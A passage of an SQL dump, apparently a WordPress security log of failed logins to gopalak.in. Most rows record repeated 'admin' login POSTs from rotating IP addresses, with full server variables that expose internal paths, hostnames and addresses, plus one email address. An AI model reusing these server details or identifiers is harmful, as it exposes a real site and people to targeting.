:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745689531.1725061;s:12:\"REQUEST_TIME\";i:1745689531;}}','198.54.114.125',0,'2025-04-26 23:15:32','1970-01-01 00:00:00'),(94350,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49720\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745689949.3245111;s:12:\"REQUEST_TIME\";i:1745689949;}}','198.54.114.59',0,'2025-04-26 23:22:31','1970-01-01 00:00:00'),(94351,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38894\";s:11:\"REMOTE_ADDR\";s:13:\"49.238.228.30\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745690382.0972099;s:12:\"REQUEST_TIME\";i:1745690382;}}','49.238.228.30',0,'2025-04-26 23:29:44','1970-01-01 00:00:00'),(94352,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53730\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.227\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745690831.3553021;s:12:\"REQUEST_TIME\";i:1745690831;}}','68.65.120.227',0,'2025-04-26 23:37:13','1970-01-01 00:00:00'),(94353,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53918\";s:11:\"REMOTE_ADDR\";s:14:\"103.163.214.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745691289.8793261;s:12:\"REQUEST_TIME\";i:1745691289;}}','103.163.214.43',0,'2025-04-26 23:44:51','1970-01-01 00:00:00'),(94354,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47768\";s:11:\"REMOTE_ADDR\";s:12:\"42.112.239.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745691751.4058981;s:12:\"REQUEST_TIME\";i:1745691751;}}','42.112.239.8',0,'2025-04-26 23:52:33','1970-01-01 00:00:00'),(94355,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51936\";s:11:\"REMOTE_ADDR\";s:12:\"62.60.160.33\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745692201.0518329;s:12:\"REQUEST_TIME\";i:1745692201;}}','62.60.160.33',0,'2025-04-27 00:00:02','1970-01-01 00:00:00'),(94356,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39412\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.119.106\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745692662.415221;s:12:\"REQUEST_TIME\";i:1745692662;}}','198.54.119.106',0,'2025-04-27 00:07:44','1970-01-01 00:00:00'),(94357,0,'a:2:{s:8:\"username\";s:24:\"loggershell443@gmail.com\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:11:\"HTTP_COOKIE\";s:84:\"_jwp=1; swpm_session=cebbd73d88f76fff5c03918a93e15f36; _uid=rB8jg2gNKAeabW2rAwPBAg==\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40690\";s:11:\"REMOTE_ADDR\";s:12:\"69.10.52.140\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745692679.8125479;s:12:\"REQUEST_TIME\";i:1745692679;}}','69.10.52.140',0,'2025-04-27 00:08:01','1970-01-01 00:00:00'),(94358,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39482\";s:11:\"REMOTE_ADDR\";s:14:\"37.156.147.221\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745693116.0643761;s:12:\"REQUEST_TIME\";i:1745693116;}}','37.156.147.221',0,'2025-04-27 00:15:17','1970-01-01 00:00:00'),(94359,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45012\";s:11:\"REMOTE_ADDR\";s:14:\"183.90.183.156\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745693566.647145;s:12:\"REQUEST_TIME\";i:1745693566;}}','183.90.183.156',0,'2025-04-27 00:22:48','1970-01-01 00:00:00'),(94360,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53330\";s:11:\"REMOTE_ADDR\";s:13:\"186.64.116.45\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_